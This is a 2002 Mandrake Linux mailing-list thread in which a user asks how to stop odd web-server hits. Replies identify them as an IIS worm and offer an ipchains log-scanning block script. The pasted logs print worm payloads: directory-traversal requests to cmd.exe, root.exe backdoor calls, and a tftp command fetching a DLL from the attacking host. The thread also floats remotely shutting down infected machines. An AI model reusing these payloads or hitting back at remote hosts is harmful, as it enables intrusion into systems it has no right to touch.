Re: [newbie] Can't block dos attack
Many thanks for the info Hey, where did it talk about remote shutdown? I saw no such reference. But I do like the auto-responder and e mailing alerter. I'm trying to figure out how to make it work. I will e mail again when I get some results, I'm still being hit and I don't know how to stop them. __ Do You Yahoo!? Yahoo! Health - Feel better, live better http://health.yahoo.com Want to buy your Pack or Services from MandrakeSoft? Go to http://www.mandrakestore.com
[newbie] Can't block dos attack
I am getting strange hits to my web server, I don't like it and I wish to know how to stop them from slipping past my defenses. I try using ipchains, most addresses are blocked, but for reasons I can't figure out, this address 65.192.23.150 keeps showing up. I don't understand it, if ipchains, /etc/hosts.deny can't block it, what can? Do I send back a command to shut down their server? How do I get the point accross? 65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 342 - - 65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 358 - - 65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - - 65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - - 65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - - 65.192.23.150 - - [28/Jul/2002:17:50:08 -0500] GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - - 65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] GET /scripts/root.exe?/c+dir HTTP/1.0 200 87 - - 65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] GET /scripts/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll HTTP/1.0 200 87 - - 65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /scripts/httpodbc.dll HTTP/1.0 404 307 - - 65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /MSADC/root.exe?/c+dir HTTP/1.0 200 87 - - 65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /MSADC/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll HTTP/1.0 200 87 - - 65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /MSADC/httpodbc.dll HTTP/1.0 404 305 - - 65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 311 - - 65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 311 - - 65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - - 65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 342 - - 65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 342 - - 65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 358 - - 65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - - 65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - - 65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - - 65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - - __ Do You Yahoo!? Yahoo! Health - Feel better, live better http://health.yahoo.com Want to buy your Pack or Services from MandrakeSoft? Go to http://www.mandrakestore.com
Re: [newbie] Can't block dos attack
Try the script below, which should take care of the problem. Of course,
this isn't a dos attack, it's a virus attack (one of the viruses going
around attempting to infect an iis server).
Which kernel are you using? If it's 2.4.x, iptables is the way to block
things out. (in that case let me know, and I'll adapt this to deal with
iptables).
Michael
-- Begin Script --
#!/bin/sh
#
# Block sites which originate Nimba queries from Apache server
# Apache must be configured with HostnameLookups Off
# Adapted from an earlier script found on one of the Mandrake lists
# Changes by Michael Viron
# Last Update: 2/20/2002
LOGS=/var/log/httpd
# Change IP to reflect yours.
DESTINATION = 192.168.1.1
cd $LOGS
grep '^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]* ' * 2/dev/null |
awk '/system32\/cmd\.exe/ {sub(/[^:]*:/,);print $1}' |
sort -u |
while read host
do
if ! fgrep $host /var/tmp/blocked /dev/null
then
echo $host /var/tmp/blocked
/sbin/ipchains -I input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY
echo -A input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY
/etc/ipchains.add
fi
done
# Block sites which originate Nimbda queries from Apache server
# Apache must be configured with HostnameLookups Off
#LOGS=/var/log/httpd
#cd $LOGS
grep '^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]* ' * 2/dev/null |
awk '/scripts\/Admin\.dll/ {sub(/[^:]*:/,);print $1}' |
sort -u |
while read host
do
if ! fgrep $host /var/tmp/blocked /dev/null
then
echo $host /var/tmp/blocked
/sbin/ipchains -I input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY
echo -A input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY
/etc/ipchains.add
fi
done
grep '^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]* ' * 2/dev/null |
awk '/MSACD\/Admin\.dll/ {sub(/[^:]*:/,);print $1}' |
sort -u |
while read host
do
if ! fgrep $host /var/tmp/blocked /dev/null
then
echo $host /var/tmp/blocked
/sbin/ipchains -I input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY
echo -A input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY
/etc/ipchains.add
fi
done
grep '^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]* ' * 2/dev/null |
awk '/scripts\/root\.exe/ {sub(/[^:]*:/,);print $1}' |
sort -u |
while read host
do
if ! fgrep $host /var/tmp/blocked /dev/null
then
echo $host /var/tmp/blocked
/sbin/ipchains -I input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY
echo -A input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY
/etc/ipchains.add
fi
done
grep '^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]* ' * 2/dev/null |
awk '/default\.ida/ {sub(/[^:]*:/,);print $1}' |
sort -u |
while read host
do
if ! fgrep $host /var/tmp/blocked /dev/null
then
echo $host /var/tmp/blocked
/sbin/ipchains -I input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY
echo -A input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY
/etc/ipchains.add
fi
done
cat /etc/ipchains.add /etc/sysconfig/ipchains
/etc/rc.d/init.d/ipchains restart
rm -f /etc/ipchains.add
-- End Script --
At 05:29 PM 7/28/2002 -0700, you wrote:
I am getting strange hits to my web server,
I don't like it and I wish to know how
to stop them from slipping past my defenses.
I try using ipchains, most addresses are
blocked, but for reasons I can't figure out,
this address 65.192.23.150 keeps showing up.
I don't understand it, if ipchains,
/etc/hosts.deny can't block it, what can?
Do I send back a command to shut down
their server?
How do I get the point accross?
65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0 404 342 - -
65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s
ystem32/cmd.exe?/c+dir
HTTP/1.0 404 358 - -
65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0 400 308 - -
65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0 400 308 - -
65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0 404 325 - -
65.192.23.150 - - [28/Jul/2002:17:50:08 -0500] GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
HTTP/1.0 404 325 - -
65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] GET
/scripts/root.exe?/c+dir HTTP/1.0 200 87 - -
65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] GET
/scripts/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.
dll
HTTP/1.0 200 87 - -
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET
/scripts/httpodbc.dll HTTP/1.0 404 307 - -
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET
Re: [newbie] Can't block dos attack
Ibly Piblo wrote: I am getting strange hits to my web server, I don't like it and I wish to know how to stop them from slipping past my defenses. I try using ipchains, most addresses are blocked, but for reasons I can't figure out, this address 65.192.23.150 keeps showing up. I don't understand it, if ipchains, /etc/hosts.deny can't block it, what can? Do I send back a command to shut down their server? How do I get the point accross? 65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 342 - - 65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 358 - - 65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - - 65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - - 65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - - 65.192.23.150 - - [28/Jul/2002:17:50:08 -0500] GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - - 65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] GET /scripts/root.exe?/c+dir HTTP/1.0 200 87 - - 65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] GET /scripts/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll HTTP/1.0 200 87 - - 65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /scripts/httpodbc.dll HTTP/1.0 404 307 - - 65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /MSADC/root.exe?/c+dir HTTP/1.0 200 87 - - 65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /MSADC/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll HTTP/1.0 200 87 - - 65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /MSADC/httpodbc.dll HTTP/1.0 404 305 - - 65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 311 - - 65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 311 - - 65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - - 65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 342 - - 65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 342 - - 65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 358 - - 65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - - 65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - - 65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - - 65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - That is no DoS attack--tis the wailing of IIS infected trying to spread its misery. Go here... Tis time to meet a friend. http://pfortin.com/Linux/MSVTS/ And yes the remote shutdown is there. While you are at it, you might want to make some more new friends http://plf.zarb.org Civileme Want to buy your Pack or Services from MandrakeSoft? Go to http://www.mandrakestore.com
